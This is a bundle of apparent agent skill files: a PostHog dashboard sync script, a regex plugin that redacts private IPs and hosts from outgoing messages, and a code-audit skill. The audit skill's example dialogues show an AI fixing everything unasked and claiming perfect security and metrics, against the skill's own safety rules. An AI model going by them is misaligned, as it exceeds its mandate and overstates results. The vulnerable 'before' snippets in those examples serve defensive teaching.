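/** Fill in display, math, and date_range for one insight entry from the config. */
function resolveInsight(insight) {
  const defaults = TYPE_DEFAULTS[insight.type];
  if (!defaults) {
    // Sketch-only behavior: fail loudly instead of sending an empty display.
    throw new Error(`Unknown insight type: ${insight.type}`);
  }
  return {
    name: insight.name,
    type: insight.type,
    math: defaults.math,
    display: insight.display || defaults.display,
    date_range: insight.date_range || '-30d',
  };
}

console.log(resolveInsight({ name: 'Unique Blog Readers', type: 'unique_users' }));
console.log(resolveInsight({ name: 'Blog Traffic Trend', type: 'traffic_trend', date_range: '-7d' }));
```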
## Environment Variables
| Variable | Required | Default | Description |
|----------|----------|---------|-------------|
| `POSTHOG_PERSONAL_API_KEY` | Yes | - | Your API key (determines org/project) |
| `POSTHOG_HOST` | No | us.i.posthog.com | API host (EU: eu.i.posthog.com) |
| `POSTHOG_UI_HOST` | No | us.posthog.com | UI host for dashboard URLs |
## Files
- `scripts/posthog_sync.sh` - CLI script (create/sync/update/export)
- `examples/blog_dashboard.json` - Example config
## References
- [PostHog API Docs](https://posthog.com/docs/api)
- [Personal API Keys](https://posthog.com/docs/api/overview#personal-api-keys)
FILE:examples/blog_dashboard.json
{
"name": "Blog Analytics",
"description": "Track blog performance and reader engagement",
"filter": {"key": "source", "value": "blog"},
"dashboard_id": null,
"insights": [
{"name": "Blog Pageviews (Total)", "type": "pageviews_total"},
{"name": "Unique Blog Readers", "type": "unique_users"},
{"name": "Blog Traffic Trend", "type": "traffic_trend"},
{"name": "Top Blog Posts", "type": "top_pages"}
]
}
FILE:scripts/posthog_sync.sh
#!/usr/bin/env bash
# posthog_sync.sh - PostHog dashboard management CLI
# Usage: posthog_sync.sh <create|sync|update|export> <config.json|dashboard_id>
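set -euo pipefail
# Fail early if the API key is missing; fall back to the US hosts otherwise
: "${POSTHOG_PERSONAL_API_KEY:?Set POSTHOG_PERSONAL_API_KEY}"
POSTHOG_HOST="${POSTHOG_HOST:-us.i.posthog.com}"
POSTHOG_UI_HOST="${POSTHOG_UI_HOST:-us.posthog.com}"
API_BASE="https://${POSTHOG_HOST}/api/projects/@current"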
command -v jq >/dev/null 2>&1 || { echo "Error: jq is required. Install with: brew install jq / apt install jq" >&2; exit 1; }
api() {
local method="$1" endpoint="$2"; shift 2
curl -sS -X "$method" "${API_BASE}${endpoint}" \
-H "Authorization: Bearer ${POSTHOG_PERSONAL_API_KEY}" \
-H "Content-Type: application/json" "$@"
}
get_project_id() {
api GET "/" | jq -r '.id'
}
# Map insight type to PostHog event query
build_insight_payload() {
local name="$1" type="$2" filter_json="$3" domain="$4" math="${5:-total}" display="${6:-}" date_range="${7:--30d}"
local event='$pageview'
local properties="[]"
if [[ -n "$filter_json" && "$filter_json" != "null" ]]; then
local fkey fval
fkey=$(echo "$filter_json" | jq -r '.key')
fval=$(echo "$filter_json" | jq -r '.value')
properties=$(jq -n --arg k "$fkey" --arg v "$fval" '[{"key":$k,"value":$v,"type":"event"}]')
elif [[ -n "$domain" && "$domain" != "null" ]]; then
properties=$(jq -n --arg d "$domain" '[{"key":"$current_url","value":$d,"operator":"icontains","type":"event"}]')
fi
local insight_math="$math"
case "$type" in
pageviews_total) display="${display:-BoldNumber}"; insight_math="total" ;;
unique_users) display="${display:-BoldNumber}"; insight_math="dau" ;;
traffic_trend) display="${display:-ActionsLineGraph}"; insight_math="total" ;;
top_pages) display="${display:-ActionsTable}"; insight_math="total"
properties=$(echo "$properties" | jq '. + [{"key":"$current_url","type":"event"}]')
;;
esac
jq -n \
--arg name "$name" \
--arg display "$display" \
--arg math "$insight_math" \
--arg date_from "$date_range" \
--arg event "$event" \
--argjson properties "$properties" \
'{
name: $name,
query: {
kind: "EventsQuery",
select: ["*"],
event: $event,
properties: $properties,
math: $math,
after: $date_from
},
filters: {
insight: "TRENDS",
events: [{id: $event, math: $math, properties: $properties}],
display: $display,
date_from: $date_from
}
}'
}
cmd_create() {
local config_file="$1"
[[ -f "$config_file" ]] || { echo "Error: Config file not found: $config_file" >&2; exit 1; }
local name description filter domain
name=$(jq -r '.name' "$config_file")
description=$(jq -r '.description // ""' "$config_file")
filter=$(jq -c '.filter // null' "$config_file")
domain=$(jq -r '.domain_filter // null' "$config_file")
echo "Creating dashboard: $name"
local dash_result
dash_result=$(api POST "/dashboards/" -d "$(jq -n --arg n "$name" --arg d "$description" '{name:$n, description:$d}')")
local dash_id
dash_id=$(echo "$dash_result" | jq -r '.id')
if [[ -z "$dash_id" || "$dash_id" == "null" ]]; then
echo "Error: Failed to create dashboard" >&2
echo "$dash_result" >&2
exit 1
fi
echo "Dashboard created: ID $dash_id"
# Update config with dashboard_id
local tmp
tmp=$(mktemp)
jq --argjson id "$dash_id" '.dashboard_id = $id' "$config_file" > "$tmp" && mv "$tmp" "$config_file"
# Create insights
local insight_count
insight_count=$(jq '.insights | length' "$config_file")
for (( i=0; i<insight_count; i++ )); do
local iname itype imath idisplay irange
iname=$(jq -r ".insights[$i].name" "$config_file")
itype=$(jq -r ".insights[$i].type" "$config_file")
imath=$(jq -r ".insights[$i].math // \"total\"" "$config_file")
idisplay=$(jq -r ".insights[$i].display // \"\"" "$config_file")
irange=$(jq -r ".insights[$i].date_range // \"-30d\"" "$config_file")
echo "Creating insight: $iname"
local payload
payload=$(build_insight_payload "$iname" "$itype" "$filter" "$domain" "$imath" "$idisplay" "$irange")
payload=$(echo "$payload" | jq --argjson did "$dash_id" '. + {dashboards: [$did]}')
local result
result=$(api POST "/insights/" -d "$payload")
echo "$result" | jq '{id: .id, name: .name}'
done
local project_id
project_id=$(get_project_id)
echo "Dashboard URL: https://${POSTHOG_UI_HOST}/project/${project_id}/dashboard/${dash_id}"
}
cmd_sync() {
local config_file="$1"
[[ -f "$config_file" ]] || { echo "Error: Config file not found: $config_file" >&2; exit 1; }
local dash_id
dash_id=$(jq -r '.dashboard_id' "$config_file")
[[ "$dash_id" != "null" && -n "$dash_id" ]] || { echo "Error: dashboard_id is null. Run create first." >&2; exit 1; }
local filter domain
filter=$(jq -c '.filter // null' "$config_file")
domain=$(jq -r '.domain_filter // null' "$config_file")
# Get existing insights on this dashboard
local existing
existing=$(api GET "/dashboards/${dash_id}/" | jq -r '[.tiles[].insight.name] | .[]' 2>/dev/null || echo "")
local insight_count
insight_count=$(jq '.insights | length' "$config_file")
local created=0
for (( i=0; i<insight_count; i++ )); do
local iname itype imath idisplay irange
iname=$(jq -r ".insights[$i].name" "$config_file")
itype=$(jq -r ".insights[$i].type" "$config_file")
imath=$(jq -r ".insights[$i].math // \"total\"" "$config_file")
idisplay=$(jq -r ".insights[$i].display // \"\"" "$config_file")
irange=$(jq -r ".insights[$i].date_range // \"-30d\"" "$config_file")
# -x matches the whole line, so "Blog" does not match "Blog Pageviews (Total)"
if grep -qxF -- "$iname" <<<"$existing"; then
echo "Skipping (exists): $iname"
continue
fi
echo "Creating insight: $iname"
local payload
payload=$(build_insight_payload "$iname" "$itype" "$filter" "$domain" "$imath" "$idisplay" "$irange")
payload=$(echo "$payload" | jq --argjson did "$dash_id" '. + {dashboards: [$did]}')
api POST "/insights/" -d "$payload" | jq '{id: .id, name: .name}'
created=$((created + 1))
done
echo "Sync complete: $created new insights created"
}
cmd_update() {
local config_file="$1"
[[ -f "$config_file" ]] || { echo "Error: Config file not found: $config_file" >&2; exit 1; }
local dash_id
dash_id=$(jq -r '.dashboard_id' "$config_file")
[[ "$dash_id" != "null" && -n "$dash_id" ]] || { echo "Error: dashboard_id is null." >&2; exit 1; }
local filter domain
filter=$(jq -c '.filter // null' "$config_file")
domain=$(jq -r '.domain_filter // null' "$config_file")
# Get existing insights
local tiles
tiles=$(api GET "/dashboards/${dash_id}/" | jq '[.tiles[] | {id: .insight.id, name: .insight.name}]')
local insight_count
insight_count=$(jq '.insights | length' "$config_file")
local updated=0
for (( i=0; i<insight_count; i++ )); do
local iname itype imath idisplay irange
iname=$(jq -r ".insights[$i].name" "$config_file")
itype=$(jq -r ".insights[$i].type" "$config_file")
imath=$(jq -r ".insights[$i].math // \"total\"" "$config_file")
idisplay=$(jq -r ".insights[$i].display // \"\"" "$config_file")
irange=$(jq -r ".insights[$i].date_range // \"-30d\"" "$config_file")
local insight_id
insight_id=$(echo "$tiles" | jq -r --arg n "$iname" '.[] | select(.name == $n) | .id')
if [[ -z "$insight_id" ]]; then
echo "Not found (skipping): $iname"
continue
fi
echo "Updating insight: $iname (ID: $insight_id)"
local payload
payload=$(build_insight_payload "$iname" "$itype" "$filter" "$domain" "$imath" "$idisplay" "$irange")
api PATCH "/insights/${insight_id}/" -d "$payload" | jq '{id: .id, name: .name}'
updated=$((updated + 1))
done
echo "Update complete: $updated insights updated"
}
cmd_export() {
local dash_id="$1"
local dash
dash=$(api GET "/dashboards/${dash_id}/")
echo "$dash" | jq '{
name: .name,
description: .description,
dashboard_id: .id,
insights: [.tiles[] | {
name: .insight.name,
type: "custom",
filters: .insight.filters
}]
}'
}
# --- Main ---
case "${1:-help}" in
create) shift; cmd_create "$@" ;;
sync) shift; cmd_sync "$@" ;;
update) shift; cmd_update "$@" ;;
export) shift; cmd_export "$@" ;;
help|--help|-h)
echo "Usage: posthog_sync.sh <create|sync|update|export> <config.json|dashboard_id>"
echo ""
echo "Commands:"
echo " create <config.json> Create dashboard + insights"
echo " sync <config.json> Add new insights (skip existing)"
echo " update <config.json> Update all insights with current config"
echo " export <dashboard_id> Export dashboard to JSON config"
;;
*) echo "Unknown command: $1" >&2; exit 1 ;;
esac
OpenClaw plugin that scrubs private infrastructure details from outgoing messages. Regex-based redaction of RFC 1918 IPs, localhost ports, SSH targets, and h...
---
name: content-scrubber
version: 1.0.0
description: "OpenClaw plugin that scrubs private infrastructure details from outgoing messages. Regex-based redaction of RFC 1918 IPs, localhost ports, SSH targets, and hostnames before they reach Discord, Telegram, or other messaging surfaces."
---
# Content Scrubber
An OpenClaw extension plugin that intercepts outgoing messages and redacts private infrastructure details before delivery.
## What It Catches
- **RFC 1918 IPv4 addresses**: 10.x.x.x, 172.16-31.x.x, 192.168.x.x
- **Loopback addresses**: 127.x.x.x
- **localhost with ports**: localhost:8080, localhost:3000, etc.
- **SSH/SCP targets**: [email protected]:/path
- **Custom hostnames**: hostname patterns, configured by editing `RULES` in `index.ts` (the shipped rule matches `clawdbot`)
## How It Works
The plugin registers as a message interceptor. Before any message leaves OpenClaw (Discord, Telegram, Signal, etc.), it runs through regex-based scrubbing rules that replace private details with safe placeholders like `[redacted-ip]`, `[redacted-service]`, `[redacted-target]`.

Rules are deterministic (regex, not LLM), so they're fast, auditable, and applied the same way to every message: anything a rule matches is always redacted, which an LLM scrubber can't guarantee.
## Installation
1. Copy the plugin files to your OpenClaw extensions directory:

```
~/.openclaw/extensions/content-scrubber/
├── index.ts
├── openclaw.plugin.json
└── package.json
```

2. Add to your `openclaw.json` plugins config:

```json
{
  "plugins": {
    "entries": {
      "content-scrubber": {
        "enabled": true,
        "config": {
          "dryRun": false,
          "allowedRecipients": []
        }
      }
    }
  }
}
```

3. Restart OpenClaw.
## Configuration
| Option | Type | Default | Description |
|--------|------|---------|-------------|
| `dryRun` | boolean | false | Log what would be scrubbed without actually redacting |
| `allowedRecipients` | string[] | [] | Chat IDs where scrubbing is skipped (e.g., private DMs with yourself) |
## Example
**Before scrubbing:**

> SSH into [email protected] and check the service on localhost:8096

**After scrubbing:**

> SSH into [redacted-target] and check the service on [redacted-service]

FILE:index.ts
import type { OpenClawPluginApi } from "openclaw/plugin-sdk";

type ContentScrubberConfig = {
  dryRun?: boolean;
  allowedRecipients?: string[];
};

type ScrubRule = {
  name: string;
  pattern: RegExp;
  replacement: string;
};

const RULES: ScrubRule[] = [
  // SSH/SCP targets: must come before generic RFC 1918 to catch user@host patterns
  {
    name: "ssh-scp-target",
    pattern: /\b\w+@(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3}|127\.\d{1,3}\.\d{1,3}\.\d{1,3})(?::\S+)?/g,
    replacement: "[redacted-target]",
  },
  // localhost with port
  {
    name: "localhost-port",
    pattern: /\blocalhost:\d+/g,
    replacement: "[redacted-service]",
  },
  // bare localhost
  {
    name: "localhost-bare",
    pattern: /\blocalhost\b/g,
    replacement: "[redacted-service]",
  },
  // hostname "clawdbot"
  {
    name: "hostname",
    pattern: /\bclawdbot\b/gi,
    replacement: "[redacted-host]",
  },
  // RFC 1918 + loopback IPv4
  {
    name: "rfc1918-ip",
    pattern: /\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3}|127\.\d{1,3}\.\d{1,3}\.\d{1,3})\b/g,
    replacement: "[redacted-ip]",
  },
  // "port NNNNN" references
  {
    name: "port-reference",
    pattern: /\bport\s+\d{4,5}\b/gi,
    replacement: "port [redacted]",
  },
  // known internal ports in URLs (colon + port number)
  {
    name: "known-port",
    pattern: /:(?:5201|5202|5204|8005|11434|18789)\b/g,
    replacement: ":[redacted]",
  },
];

export default function register(api: OpenClawPluginApi) {
  const cfg = (api.pluginConfig ?? {}) as ContentScrubberConfig;
  const dryRun = cfg.dryRun === true;
  const allowed = new Set(cfg.allowedRecipients ?? []);

  api.logger.info(
    `content-scrubber: Loaded with ${RULES.length} built-in rules${allowed.size ? `, ${allowed.size} allowed recipient(s)` : ""}`,
  );

  api.on("message_sending", async (event, ctx) => {
    const text = event.content;
    if (!text) return;

    // Skip scrubbing for allowed recipients (e.g. owner DMs)
    if (event.to && allowed.has(event.to)) return;

    const counts: Record<string, number> = {};
    let scrubbed = text;

    for (const rule of RULES) {
      // Reset lastIndex for global regexps reused across calls
      rule.pattern.lastIndex = 0;
      const matches = scrubbed.match(rule.pattern);
      if (matches && matches.length > 0) {
        counts[rule.name] = matches.length;
        scrubbed = scrubbed.replace(rule.pattern, rule.replacement);
      }
    }

    const totalMatches = Object.values(counts).reduce((sum, n) => sum + n, 0);
    if (totalMatches === 0) return;

    const breakdown = Object.entries(counts)
      .map(([name, n]) => `${name}=${n}`)
      .join(", ");
    const target = ctx.channelId ?? "unknown";

    if (dryRun) {
      api.logger.warn(
        `content-scrubber: [DRY-RUN] Would scrub ${totalMatches} match(es) [${breakdown}] → ${target}`,
      );
      return;
    }

    api.logger.info(
      `content-scrubber: Scrubbed ${totalMatches} match(es) [${breakdown}] → ${target}`,
    );
    return { content: scrubbed };
  });
}

FILE:openclaw.plugin.json
{
  "id": "content-scrubber",
  "name": "Content Scrubber",
  "description": "Scrubs internal infrastructure details (IPs, ports, hostnames) from outgoing messages before delivery",
  "configSchema": {
    "type": "object",
    "additionalProperties": false,
    "properties": {
      "dryRun": { "type": "boolean" },
      "allowedRecipients": { "type": "array", "items": { "type": "string" } }
    }
  }
}

FILE:package.json
{
  "name": "content-scrubber",
  "version": "1.0.0",
  "private": true,
  "description": "Scrubs internal infrastructure details (IPs, ports, hostnames) from outgoing messages",
  "openclaw": { "extensions": ["./index.ts"] }
}
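The rule order in the scrubber matters: the `user@host` rule has to run before the bare-IP rule, otherwise the IP is replaced first and the username is left behind. The following is a minimal standalone sketch of that behavior, not the plugin itself. It uses a cut-down rule list, a hypothetical helper named `scrub`, and an assumed sample address (`admin@192.168.1.50`) chosen only for illustration.

```typescript
type ScrubRule = { name: string; pattern: RegExp; replacement: string };

// Shared fragment for RFC 1918 and loopback IPv4 addresses (same shape as the plugin's rules).
const PRIVATE_IP =
  "(?:10\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" +
  "|172\\.(?:1[6-9]|2\\d|3[01])\\.\\d{1,3}\\.\\d{1,3}" +
  "|192\\.168\\.\\d{1,3}\\.\\d{1,3}" +
  "|127\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})";

// Cut-down rule list for illustration; order is significant.
const DEMO_RULES: ScrubRule[] = [
  {
    name: "ssh-scp-target",
    pattern: new RegExp(`\\b\\w+@${PRIVATE_IP}(?::\\S+)?`, "g"),
    replacement: "[redacted-target]",
  },
  { name: "localhost-port", pattern: /\blocalhost:\d+/g, replacement: "[redacted-service]" },
  { name: "rfc1918-ip", pattern: new RegExp(`\\b${PRIVATE_IP}\\b`, "g"), replacement: "[redacted-ip]" },
];

// Hypothetical helper: applies each rule in order to the running result.
function scrub(text: string, rules: ScrubRule[] = DEMO_RULES): string {
  return rules.reduce((out, rule) => out.replace(rule.pattern, rule.replacement), text);
}

const sampleMessage = "SSH into admin@192.168.1.50 and check the service on localhost:8096";
const inOrder = scrub(sampleMessage);
const reversed = scrub(sampleMessage, [...DEMO_RULES].reverse());
```

With the rules in their intended order the whole SSH target is replaced; with the order reversed, the username survives next to `[redacted-ip]`, which is the leak the ordering comment in `index.ts` guards against.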
Deep-scan a codebase, understand its architecture and patterns, then produce a comprehensive audit report with prioritized fixes. Optionally apply changes on...
---
name: production-code-audit
version: 1.1.0
description: "Deep-scan a codebase, understand its architecture and patterns, then produce a comprehensive audit report with prioritized fixes. Optionally apply changes on a feature branch with a PR for review. Covers security, performance, error handling, logging, testing, and documentation."
---
# Production Code Audit
## Overview
Analyze a codebase to understand its architecture, patterns, and purpose, then produce a detailed audit report with prioritized findings. Optionally apply fixes on a dedicated branch for review via pull request. This skill scans for issues across security, performance, architecture, and quality.
## Safety & Workflow
> **Important:** This skill operates in two modes:
> 1. **Audit mode (default):** Read-only scan that produces a report. No files are modified.
> 2. **Fix mode:** When the user explicitly requests fixes, create a new branch (e.g., `audit/production-hardening`), apply changes there, and open a draft PR for review. Never push directly to main.
>
> **Secrets handling:** If hardcoded secrets are discovered, flag them in the report with file and line number. Do NOT remove or commit secrets. Advise the user to rotate the credential and use environment variables. Never log or exfiltrate secret values.
>
> **Test execution:** Only run tests in a sandboxed or CI environment. Ask the user before executing tests locally if the project has external dependencies (databases, APIs, etc.).
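The secrets-handling rule above (report file and line, never the value) can be sketched as follows. This is an illustrative heuristic under stated assumptions, not a replacement for a dedicated secret scanner: the two regular expressions and the names `SecretFinding`, `SECRET_PATTERNS`, and `findSecrets` are hypothetical.

```typescript
type SecretFinding = { file: string; line: number; kind: string };

// Illustrative patterns only: a quoted literal assigned to a secret-looking name.
const SECRET_PATTERNS: { kind: string; pattern: RegExp }[] = [
  { kind: "hardcoded-password", pattern: /password\s*[:=]\s*['"][^'"]+['"]/i },
  { kind: "hardcoded-secret", pattern: /(?:secret|api[_-]?key|token)\w*\s*[:=]\s*['"][^'"]+['"]/i },
];

// Returns the location and kind of each suspicious line. The matched value
// itself is deliberately never copied into the finding.
function findSecrets(file: string, source: string): SecretFinding[] {
  const findings: SecretFinding[] = [];
  source.split(/\r?\n/).forEach((text, index) => {
    for (const { kind, pattern } of SECRET_PATTERNS) {
      if (pattern.test(text)) {
        findings.push({ file, line: index + 1, kind });
        break; // one finding per line is enough for the report
      }
    }
  });
  return findings;
}

const sampleSource = [
  "const JWT_SECRET = 'my-secret-key-123';",
  "const port = 3000;",
  "password: 'SuperSecret123!',",
  "const key = process.env.API_KEY;",
].join("\n");
const secretFindings = findSecrets("config/example.ts", sampleSource);
```

Values read from `process.env` are not flagged because the pattern requires a quoted literal on the right-hand side.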
## When to Use This Skill
- Use when user says "audit my codebase" or "make this production-ready"
- Use when preparing for production deployment
- Use when code needs to meet corporate/enterprise standards
## How It Works
### Step 1: Codebase Discovery
**Scan and understand the codebase:**
1. **Read source files** - Scan project files (respect .gitignore, skip node_modules/vendor/dist)
2. **Identify tech stack** - Detect languages, frameworks, databases, tools
3. **Understand architecture** - Map out structure, patterns, dependencies
4. **Identify purpose** - Understand what the application does
5. **Find entry points** - Locate main files, routes, controllers
6. **Map data flow** - Understand how data moves through the system
### Step 2: Comprehensive Issue Detection
**Scan line-by-line for all issues:**
**Architecture Issues:**
- Circular dependencies
- Tight coupling
- God classes (>500 lines or >20 methods)
- Missing separation of concerns
- Poor module boundaries
- Violation of design patterns
**Security Vulnerabilities:**
- SQL injection (string concatenation in queries)
- XSS vulnerabilities (unescaped output)
- Hardcoded secrets (API keys, passwords in code)
- Missing authentication/authorization
- Weak password hashing (MD5, SHA1)
- Missing input validation
- CSRF vulnerabilities
- Insecure dependencies
**Performance Problems:**
- N+1 query problems
- Missing database indexes
- Synchronous operations that should be async
- Missing caching
- Inefficient algorithms (O(n²) or worse)
- Large bundle sizes
- Unoptimized images
- Memory leaks
**Code Quality Issues:**
- High cyclomatic complexity (>10)
- Code duplication
- Magic numbers
- Poor naming conventions
- Missing error handling
- Inconsistent formatting
- Dead code
- TODO/FIXME comments
**Testing Gaps:**
- Missing tests for critical paths
- Low test coverage (<80%)
- No edge case testing
- Flaky tests
- Missing integration tests
**Production Readiness:**
- Missing environment variables
- No logging/monitoring
- No error tracking
- Missing health checks
- Incomplete documentation
- No CI/CD pipeline
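Thresholds such as "cyclomatic complexity >10" can be approximated without a full parser. The sketch below counts decision points in a function's source text; it is a rough heuristic (it also counts keywords inside strings and comments, and it ignores ternaries), and the names `estimateComplexity` and `exceedsThreshold` are hypothetical. A real audit would more likely rely on a linter or an AST-based tool.

```typescript
// Decision points counted by this heuristic: branching keywords and short-circuit operators.
const DECISION_POINTS = /\b(?:if|for|while|case|catch)\b|&&|\|\|/g;

// Rough cyclomatic-complexity estimate: 1 + number of decision points found in the text.
function estimateComplexity(functionSource: string): number {
  const matches = functionSource.match(DECISION_POINTS);
  return 1 + (matches ? matches.length : 0);
}

// Flags a function whose estimate is above the limit (10 by default, as in the list above).
function exceedsThreshold(functionSource: string, limit = 10): boolean {
  return estimateComplexity(functionSource) > limit;
}

const sampleFunction = [
  "function f(a, b) {",
  "  if (a && b) { return 1; }",
  "  for (const x of a) { if (x) { return 2; } }",
  "  return 0;",
  "}",
].join("\n");
const sampleComplexity = estimateComplexity(sampleFunction);
```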
### Step 3: Fixes and Optimizations (Fix Mode Only)
**When the user explicitly requests fixes, apply them on a new branch:**
```bash
git checkout -b audit/production-hardening
```
1. **Refactor architecture** - Break up god classes, fix circular dependencies
2. **Fix security issues** - Use parameterized queries, flag secrets for rotation, add validation
3. **Optimize performance** - Fix N+1 queries, add caching, optimize algorithms
4. **Improve code quality** - Reduce complexity, remove duplication, fix naming
5. **Add missing tests** - Write tests for untested critical paths
6. **Add production infrastructure** - Logging, monitoring, health checks
7. **Optimize everything** - Bundle size, images, database queries
8. **Add documentation** - README, API docs, architecture docs
### Step 4: Verify and Report
**After making all changes:**
1. Run all tests to ensure nothing broke
2. Verify all security issues are fixed
3. Measure performance improvements
4. Generate comprehensive report
5. Provide before/after metrics
## Examples
### Example 1: Autonomous Codebase Transformation
```markdown
User: @production-code-audit make this production-ready
AI: I'll scan your entire codebase and transform it to production-grade quality.
**Phase 1: Discovering Codebase** (analyzing 247 files)
- Detected: Node.js + Express + PostgreSQL + React
- Architecture: MVC pattern with REST API
- Purpose: E-commerce platform
- Entry points: server.js, src/index.tsx
**Phase 2: Scanning for Issues** (line-by-line analysis)
Found 127 issues:
- 🔴 CRITICAL: 8 issues
- 🟠 HIGH: 23 issues
- 🟡 MEDIUM: 41 issues
- 🔵 LOW: 55 issues
**Phase 3: Fixing Issues Automatically**
🔴 CRITICAL FIXES (8/8 completed):
1. ✅ Fixed SQL injection in UserRepository.findByEmail()
- Before: String concatenation in query
- After: Parameterized query with $1 placeholder
2. ✅ Removed hardcoded database password from config/database.ts
- Before: password: 'SuperSecret123!'
- After: password: process.env.DB_PASSWORD
3. ✅ Added authentication to admin routes
- Before: No auth middleware
- After: authenticateToken + requireRole('admin')
4. ✅ Fixed weak password hashing (MD5 → bcrypt)
- Before: crypto.createHash('md5')
- After: bcrypt.hash(password, 12)
5. ✅ Fixed circular dependency: OrderService ↔ PaymentService
- Before: Direct imports causing cycle
- After: Event-based decoupling with EventBus
6. ✅ Added input validation to all API endpoints
- Before: No validation
- After: Zod schemas validating all inputs
7. ✅ Fixed authentication bypass in auth middleware
- Before: next() called on missing token
- After: Returns 401 error
8. ✅ Fixed mass assignment vulnerability in UserController
- Before: Accepts all fields from req.body
- After: Whitelist of allowed fields only
🟠 HIGH PRIORITY FIXES (23/23 completed):
9. ✅ Fixed N+1 query in OrderService.getOrdersWithItems()
- Before: Loop with individual queries (2.8s)
- After: Single query with joins (45ms)
- Performance: 98% improvement
10. ✅ Refactored UserService god class (850 lines → 4 focused services)
- UserAuthenticationService (login, logout, password)
- UserProfileService (CRUD operations)
- UserNotificationService (email, SMS)
- UserPermissionService (roles, permissions)
11. ✅ Added Redis caching for product queries
- Before: Database query every request
- After: Cache with 1-hour TTL
- Performance: 95% faster
12. ✅ Optimized bundle size
- Before: 850KB (gzipped: 280KB)
- After: 380KB (gzipped: 120KB)
- Improvement: 55% reduction
13. ✅ Added database indexes
- orders(user_id, status, created_at)
- products(category, price)
- Query performance: 98% improvement
[... 11 more high-priority fixes ...]
🟡 MEDIUM PRIORITY FIXES (41/41 completed):
[... all medium fixes ...]
🔵 LOW PRIORITY IMPROVEMENTS (55/55 completed):
[... all low improvements ...]
**Phase 4: Adding Production Infrastructure**
✅ Added structured logging (Winston)
✅ Added error tracking (Sentry)
✅ Added health check endpoints (/health, /ready)
✅ Added monitoring (Prometheus metrics)
✅ Added rate limiting (Redis-based)
✅ Added API documentation (Swagger/OpenAPI)
✅ Added comprehensive README
✅ Added deployment guide
✅ Added CI/CD pipeline (.github/workflows)
**Phase 5: Verification**
✅ All tests passing (1,247 tests)
✅ Test coverage: 42% → 87%
✅ Security scan: 0 vulnerabilities
✅ Performance: API response time 3.2s → 180ms
✅ Bundle size: 850KB → 380KB
✅ Lighthouse score: 62 → 94
**TRANSFORMATION COMPLETE**
Your codebase is now production-ready with enterprise-grade quality:
📊 Metrics:
- Issues fixed: 127/127 (100%)
- Test coverage: 87% (target: 80%+)
- API performance: 94% improvement
- Security: OWASP Top 10 compliant
- Code quality: Grade A-
📁 Files changed: 89 files
📝 Lines changed: +3,247 / -1,892
🚀 Ready for production deployment!
```
### Example 2: Automatic Security Hardening
```markdown
User: @production-code-audit secure this codebase
AI: Scanning for security vulnerabilities...
**Security Scan Complete**
Found 15 security issues:
- 🔴 CRITICAL: 5
- 🟠 HIGH: 7
- 🟡 MEDIUM: 3
**Fixing all security issues automatically...**
🔴 CRITICAL (5/5 fixed):
1. ✅ SQL Injection in UserRepository
\`\`\`typescript
// Before (VULNERABLE)
const query = \`SELECT * FROM users WHERE email = '\${email}'\`;
// After (SECURE)
const query = 'SELECT * FROM users WHERE email = $1';
await db.query(query, [email]);
\`\`\`
2. ✅ Hardcoded Secrets Removed
\`\`\`typescript
// Before (INSECURE)
const JWT_SECRET = 'my-secret-key-123';
// After (SECURE)
const JWT_SECRET = process.env.JWT_SECRET;
if (!JWT_SECRET) throw new Error('JWT_SECRET required');
\`\`\`
3. ✅ Authentication Added to Admin Routes
\`\`\`typescript
// Before (VULNERABLE)
router.delete('/api/admin/users/:id', deleteUser);
// After (SECURE)
router.delete('/api/admin/users/:id',
authenticateToken,
requireRole('admin'),
deleteUser
);
\`\`\`
4. ✅ Password Hashing Upgraded
\`\`\`typescript
// Before (WEAK)
const hash = crypto.createHash('md5').update(password).digest('hex');
// After (STRONG)
const hash = await bcrypt.hash(password, 12);
\`\`\`
5. ✅ Input Validation Added
\`\`\`typescript
// Before (VULNERABLE)
const user = await db.user.create({ data: req.body });
// After (SECURE)
const schema = z.object({
email: z.string().email(),
password: z.string().min(12),
name: z.string().min(2).max(100)
});
const validated = schema.parse(req.body);
const user = await db.user.create({ data: validated });
\`\`\`
**Security Status:**
- ✅ OWASP Top 10: Compliant
- ✅ SQL Injection: Protected
- ✅ XSS: Protected
- ✅ CSRF: Protected
- ✅ Authentication: Secure
- ✅ Secrets: Environment variables
- ✅ Dependencies: No vulnerabilities
🔒 Codebase is now secure and production-ready!
```
### Example 3: Performance Optimization
```markdown
User: @production-code-audit optimize performance
AI: Analyzing performance bottlenecks...
**Performance Analysis Complete**
Current metrics:
- API response time: 3.2s (target: <200ms)
- Page load time: 8.5s (target: <2s)
- Bundle size: 850KB (target: <200KB)
**Optimizing automatically...**
✅ Fixed N+1 queries (3.2s → 180ms - 94% faster)
✅ Added Redis caching (95% cache hit rate)
✅ Optimized database indexes (98% faster queries)
✅ Reduced bundle size (850KB → 380KB - 55% smaller)
✅ Optimized images (28MB → 3.2MB - 89% smaller)
✅ Implemented code splitting
✅ Added lazy loading
✅ Parallelized async operations
**Performance Results:**
| Metric | Before | After | Improvement |
|--------|--------|-------|-------------|
| API Response | 3.2s | 180ms | 94% |
| Page Load | 8.5s | 1.8s | 79% |
| Bundle Size | 850KB | 380KB | 55% |
| Image Size | 28MB | 3.2MB | 89% |
| Lighthouse | 42 | 94 | +52 points |
🚀 Performance optimized to production standards!
```
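The "Improvement" percentages in the example reports are plain relative reductions: (before - after) / before. A small sketch, with `percentImprovement` as a hypothetical helper name, reproduces the figures in the table above when both values are expressed in the same unit.

```typescript
// Relative reduction from "before" to "after", rounded to a whole percent.
// Both values must use the same unit (for example milliseconds or kilobytes).
function percentImprovement(before: number, after: number): number {
  if (before <= 0) throw new RangeError("before must be positive");
  return Math.round(((before - after) / before) * 100);
}

const apiResponse = percentImprovement(3200, 180); // 3.2s -> 180ms, in milliseconds
const pageLoad = percentImprovement(8500, 1800);   // 8.5s -> 1.8s, in milliseconds
const bundleSize = percentImprovement(850, 380);   // kilobytes
const imageSize = percentImprovement(28, 3.2);     // megabytes
```

Lighthouse scores are reported as a point difference rather than a percentage, so they are not run through this helper.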
## Best Practices
### ✅ Do This
- **Scan Everything** - Read all files, understand entire codebase
- **Fix Automatically** - Don't just report, actually fix issues
- **Prioritize Critical** - Security and data loss issues first
- **Measure Impact** - Show before/after metrics
